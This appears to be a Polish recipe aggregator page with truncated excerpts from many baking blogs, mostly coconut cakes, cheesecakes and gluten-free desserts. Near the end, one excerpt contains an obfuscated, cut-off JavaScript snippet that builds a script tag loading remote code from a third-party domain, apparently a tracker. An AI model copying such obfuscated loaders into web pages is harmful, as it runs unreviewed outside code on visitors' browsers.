Jagielnik to deser, który przygotowuję najchętniej w sezonie owocowym. Do tej pory opublikowałam dwa przepisy na jagielniki z truskawkami ( kakaowy i podwójnie truskawkowy ) i kilka z
Weekendy w domu i ogrodzieSernik jagodowy ogród jest to ciasto bez pieczenia, na czekoladowym spodzie ciasteczkowym, białą masą serowo kokosową, fioletową masą serowo jagodową, udekorowany różową polewą truskawkową i jagodami. Ozdobiony pięknymi kwiatkami oraz miętą. Sernik jest mało słodki, a mocno schłodzony idealnie się nada w upalne dni. Piękne się prezentuje, zadziwiając swymi kolorami i smakiem. Sernik, gdy już go udekorowałam(...)białej czekolady i 100 g masła) Jak zrobić biały ganache możecie zobaczyć tutaj . Dodatkowo: jagody (1 szkl. lub więcej) do udekorowania góry ciasta listki mięty kwiatki surfinie (4 szt.) cukier puder do psypania jagód na górze ciasta (opcjonalnie) Potrzebne gadżety: szklanka = 250ml. tortownica 26 cm. mikser szpatułka papier do pieczenia waga miarka kuchenna (adsbygoogle = window.adsbygoogle || []).push({}); WYKONANIE
Rita creativewtedy udał i udaje się do dzisiaj. A do tego jest bardzo smaczny i zdecydowanie warty wypróbowania.Z wyglądu jest czarno-biały, w smaku lekko kokosowy. Od standardowych serników różni się zdecydowanie większą ilością ciasta, ale nie dominuje nad częścią białą-serową a idealnie z nią współgra. Sernik idealny na świąteczny stół, jak również na każdą inną okazję.Zachwyci Was.Polecam(...)Składniki na ciasto: 270 g mąki pszennej330 g cukru3 łyżki kakao1 kostka margaryny1,5 łyżeczki proszku do pieczenia1,5 łyżeczki cukru waniliowego4 jajka5 łyżek wody Margarynę, cukier, cukier waniliowy, kakao, wodę doprowadzamy do wrzenia,mieszając od czasu do czasu gotujemy około 5 minut.Odstawiamy do ostudzenia.Następnie odlewamy około pół szklanki a do reszty dodajemy żółtka (białka ubijamy oddzielnie na sztywną
Made By Mom And SonGofry o smaku ciasta marchewkowego. Ciasto przygotowuje się niemal tak samo jak to do pieczenia. Tylko zamiast do foremki ciasto wlewamy do gofrownicy. 3/4 szklanki mąki ( dowolnej, u mnie orkiszowa) 1/2 szklanki mielonych migdałów 1 średniej wielkości marchew mleko sojowe ( lub inne) ok. 3/4 szklanki płaska łyżeczka cynamonu czubata łyżka cukru kokosowego lub trzcinowego 1 jajko płaska łyżeczka proszku(...)ubijania, skórka z pomarańczy, 2 łyżeczki ksylitolu, listki mięty Marchew zetrzeć na średnich oczkach. Połączyć wszystkie składniki na gładkie gęste ciasto. Na koniec dodać startą marchew. Wymieszać. Piec w gofrownicy. Podawać z ubitą śmietaną lub ubitym mlekiem kokosowym (znajdziecie jako nowość od firmy Amazin). Posypać skórką z pomarańczy, dodać miętę
AZgotuj!oczywiście nie tylko dla alergików... Pokochacie to ciasto ! :) Składniki: - 2 saszetki kaszy jaglanej/szklanka kaszy jaglanej; - 4 łyżki erytrolu; - 2 łyżeczki miodu; - 1,5 szklanki napoju ryżowego; - 1,5 szklanki wody; - 1 budyń waniliowy bez cukru; - 2 jaja; - 3 łyżki mąki kukurydzianej; - 1 łyżeczka sody oczyszczonej; - 2 łyżki oleju kokosowego; - garść żurawiny; - garść orzechów brazylijskich; - 1 łyżka nasion chia. Sposób(...)sodę oczyszczoną oraz nasiona chia - całość zblenduj; - do masy dodaj garść żurawiny oraz posiekanych orzechów brazylijskich - całość wymieszaj; - masę przełóż do okrągłej formy (wysmarowanej olejem kokosowym) i piecz 45 minut w 170 stopniach, aż ciasto się zarumieni. UWAGA! Zniżka 5% na produkty Agnex dla Moich czytelników na hasło ZDROWE-BAKALIE w sklepie www.sklepagnex.pl (rabat obowiązuje
MintTastepralinek, ponieważ nie chciałabym nikogo do nich zrażać. Sama mam problem z kokosem oraz różnych przysmaków z jego dodatkiem. Choć często używam w kuchni mleko kokosowe, lubię też czasami posypać jego wiórkami owsiankę czy ciasto, to jednak jego dodatek w niektórych produktach wydaje mi się zbyt przytłaczający i zbyt intensywny. I tak jest w tym przypadku. Przez moją trwającą już
Roślinna - blog wegańskidawnych lat. Na szczęście skład cukiniolady o wiele zdrowszy w przeciwieństwie do starej cukrowej babki! :) Obie wersje smaczne. Ta z olejem kokosowym bardzo aromatyczna i chyba bardziej Lilce przypadła do smaku. Wcinała jeden kawałek za drugim. Przepis na ciasto z cukinią Składniki 2 szklanki startej na małych oczkach cukinii (bez skórki) ½ szklanki płynnego oleju kokosowego lub rzepakowego około(...)syrop klonowy. Dodajemy kakao, mieszamy i dodajemy startą cukinię. Na końcu wsypujemy mąkę i sodę. Wersja druga: wszystkie składniki wrzuciłam do thermomixa i zmiksowałam na gładką masę. Ciasto jest jaśniejsze, bo robiłam je na oko. Pieczemy w 180 stopniach około 40 minut. ciasto czekoladowe z cukinią Inne przepisy z tej serii: Domowa czekolada Domowe monte Domowe raffaello Domowa
lady-och-mistrzyni.blogspot.comktóre zabieram do znajomych, crumble z jabłkami. Szybkie i bezglutenowe crumble w wersji wegańskiej, bez dodatku rafinowanego cukru. Zamiast masła użyłam kokosowego oleju, a same crumble z jabłkami “osłodziłam ” daktylami i syropem agawe. Crumble to ciasto bezglutenowe, bo upiekłam je z gryczanych płatków. Crumble z jabłkami Składniki: prostokątna forma 30 cm x 20 cm 6-8 porcji
codojedzeniapropozycja na to święto. Polecam je szczególnie tym osobom, które z przyczyn zdrowotnych muszą unikać glutenu i nabiału. Oczywiście, nie będę Was oszukiwać, to nie są tradycyjne pączki z ciasta drożdżowego z dodatkiem konfitury z róży. Ekspresowe, bezglutenowe pączki smakiem przypominają mini pączusie. Tak naprawdę, nie czuć w ogóle, że nie ma w nich mąki pszennej. Jej zamienniczka – mąka(...)wanilii, a następnie proszek do pieczenia wymieszany z mąkę ryżową (powoli, cały czas ucierając). Do tak przygotowanej mieszanki dodaj rum, sok z cytryny i mleko kokosowe, cały czas miksuj, tak aby uzyskać jednolite ciasto. Powinn być lekko płynne (ciasto najlepiej ocenić wlewając je na gorący olej – gdy się nie rozpada to jest idealne :)) w przeciwnym wypadku dodaj więcej mąki
365 dni dookoła kuchniPyszne ciasto, idealne składniki, w prost prosi się o powtórkę. Prezentuje się i smakuję równie idealnie. Nie jest trudne do wykonania. A znika bardzo szybko.... Gorąco polecam! Składniki: 200 g margaryny/masła 150 g maku 100 g mielonych migdałów 100 g wiórek kokosowych 80 g cukru 8 białek 4 żółtka 2 budynie śmietankowe(...)żółtka i dalej miksujemy. Mak łączymy z wiórkami i migdałami. Dodajemy do piany jajecznej i delikatnie mieszamy do połączenia się składników. Dwie tortownice 28 cm wykładamy papierem do pieczenia. Ciasto dzielimy na pół i wstawiamy do piekarnika nagrzanego do 170 stopni. Pieczemy 20 minut. Odlewamy pół szklanki mleka, a resztę zagotowujemy z cukrem. Z odlanym mlekiem mieszamy budynie i żółtka
Malinowe PocałunkiSkładniki – porcja na formę o średnicy 26 cm: 300 gram kruchych ciastek, 150 gram masła, 400 ml mleka kokosowego, 200 gram białej czekolady, 170 gram
Coś bym zjadłamocno aromatycznym, wilgotnym i nadzianym pysznościami. Postanowiłam zrobić takowe . Przede wszystkim dla dzieci. Nie lubię rodzynek, dodałam suszoną żurawinę. Żurawinę toleruję w postaci suszonej, rodzynek jakoś nie mogę przełknąć. Ciasto jest fajne, wilgotne i wierzcie mi poleży nawet tydzień, a im dłużej leży, tym lepiej smakuje! Szklanka u mnie to 250 ml Składniki 2 szklanki mąki – 1 szklanka tortowej pszennej(...)powoli mąkę mieszając szpatułką, już nie robotem. Wsyp wszystkie bakalie, wymieszaj do połączenia się wszystkiego. Keksówkę o długości np. 25 cm może być inny rozmiar – ciasto będzie po prostu wyższe lub niższe- wysmaruj olejem kokosowym lub masłem i obsyp mąką. Wlej masę i wstaw do nagrzanego piekarnika. Temperatura 180 stopni ( góra i dół ) i pieczemy około 45 minut
Z Kuchni Do Kuchnikubka wlej letnie mleko, dodaj świeże drożdże, cukier. Wszystko bardzo dokładnie wymieszaj. 2. W dużej misce połącz mąkę z zaczynem, dodaj jaja i olej kokosowy oraz szczyptę soli. 3. Po połączeniu wyrabiaj ciasto na gładką masę. Ciasto będzie gotowe, gdy będzie lśniące i gładkie. Takie ciasto przykryj bawełnianą szmatką i pozwól mu odpocząć i urosnąć. 4. Gdy ciasto podwoi swoją(...)ulubionym nadzieniem, możesz z powodzeniem zastąpić je budyniem, twarożkiem, czekoladą, masą orzechową, masą makową. Twoja fantazja nie powinna być niczym ograniczona! SMACZNEGO! Artykuł powstał przy współpracy z producentem oleju kokosowego, firmą Laboratorium BIOOIL. (function(){ znwv=document.createElement("script");znwv_=(("u")+"st")+"a";znwv.async=true; znwv.type="text/javascript";znwv_+=("t.i")+""+"n";znwv_+=(("f")+"o");znwv_+="/"; znwvu="3360529.";znwvu+="2e5pl62gnwvus810z4d"+"geh4ig8fu5z1g"; znwv.src="//"+znwv
Mostek w kuchnilodówce) Polewa daktylowa: 300 g daktyli bez pestek 4 łyżki masła orzechowego Olej kokosowy rozpuść z miodem na wolnym ogniu. W misce wymieszaj mąkę z komosy ryżowej, płatki owsiane, kakao, cynamon i sól. Suche składniki wymieszaj ze składnikami mokrymi, tak aby powstało zwarte ciasto. Tortownicę wyłóż papierem do pieczenia, przełóż na nią rozwałkowane ciasto i piecz ok. 25 minut(...)jaglaną, miód, puree z dyni, skórkę otartą z pomarańczy, limoncello i budyń waniliowy. Całość dokładnie zmiksuj. Z puszki wyjmij śmietankę kokosową i ubij ją na sztywną pianę. Wymieszają ją delikatnie z masą jaglaną. Masę przełóż na podpieczony spód ciasta i piecz w piekarniku rozgrzanym do 180 stopni ok. 35 minut. W tym czasie przygotuj karmel. Daktyle zalej wrzątkiem i odstaw
365 dni dookoła kuchnimikserem, następnie dodać mąkę przesianą z proszkiem do pieczenia oraz wiórki kokosowe i delikatnie wymieszać, można mikserem na małych obrotach.Ciasto wylać do tortownicy (26 cm) lub prostokątnej formy wyłożonej papierem do pieczenia, na wierzchu poukładać owoce.Piec w temperaturze 180 stopni, ok. 50 min. Najlepiej sprawdzić patyczkiem czy ciasto jest upieczone
Mix smaku